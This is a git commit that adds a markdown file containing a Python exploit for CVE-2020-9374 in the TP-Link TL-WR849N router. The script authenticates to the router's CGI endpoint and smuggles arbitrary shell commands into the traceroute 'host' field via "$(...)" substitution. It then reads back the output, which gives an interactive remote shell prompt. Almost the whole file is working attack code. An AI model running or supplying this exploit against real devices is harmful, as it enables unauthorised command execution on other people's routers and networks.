add CVE-2020-9374-TP LINK TL-WR849N - RCE

2025-06-20 09:50:19 +00:00 · 2020-03-02 22:11:33 +08:00 · 2020-03-02 22:11:33 +08:00 · b7a5094d6e
commit b7a5094d6e
parent a04b1c82e1
1 changed files with 64 additions and 0 deletions
--- a/CVE-2020-9374.md
+++ b/CVE-2020-9374.md
@ -0,0 +1,64 @@
+```python
+# Exploit Title: TP LINK TL-WR849N - Remote Code Execution
+# Date: 2019-11-20
+# Exploit Author: Elber Tavares
+# Vendor Homepage: https://www.tp-link.com/
+# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
+# Version: TL-WR849N 0.9.1 4.16
+# Tested on: linux, windows
+# CVE : CVE-2020-9374
+
+
+import requests
+
+def output(headers,cookies):
+    url = 'http://192.168.0.1/cgi?1'
+    data = ''
+    data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'
+    data += 'diagnosticsState\x0d\x0a'
+    data += 'X_TP_HopSeq\x0d\x0a'
+    data += 'X_TP_Result\x0d\x0a'
+    r = requests.post(url,data=data,headers=headers,cookies=cookies)
+    saida = r.text
+    filtro = saida.replace(': Name or service not known','')
+    filtro = filtro.replace('[0,0,0,0,0,0]0','')
+    filtro = filtro.replace('diagnosticsState=','')
+    filtro = filtro.replace('X_TP_HopSeq=0','')
+    filtro = filtro.replace('X_TP_Result=','')
+    print(filtro[:-8])
+
+def aceppt(headers,cookies):
+    url = 'http://192.168.0.1/cgi?7'
+    data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a'
+    r = requests.post(url,data=data,headers=headers,cookies=cookies)
+    output(headers,cookies)
+
+
+def inject(command,headers,cookies):
+    url = 'http://192.168.0.1/cgi?2'
+    data = ''
+    data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\x0d\x0a'
+    data += 'maxHopCount=20\x0d\x0a'
+    data += 'timeout=5\x0d\x0a'
+    data += 'numberOfTries=1\x0d\x0a'
+    data += 'host=\"$('+command+')\"\x0d\x0a'
+    data += 'dataBlockSize=64\x0d\x0a'
+    data += 'X_TP_ConnName=ewan_pppoe\x0d\x0a'
+    data += 'diagnosticsState=Requested\x0d\x0a'
+    data += 'X_TP_HopSeq=0\x0d\x0a'
+    r = requests.post(url,data=data,headers=headers,cookies=cookies)
+    aceppt(headers,cookies)
+
+
+
+def main():
+    cookies = {"Authorization": "Basic REPLACEBASE64AUTH"}
+    headers = {'Content-Type': 'text/plain',
+      'Referer': 'http://192.168.0.1/mainFrame.htm'}
+    while True:
+        command = input('$ ')
+        inject(command,headers,cookies)
+
+
+main()
+```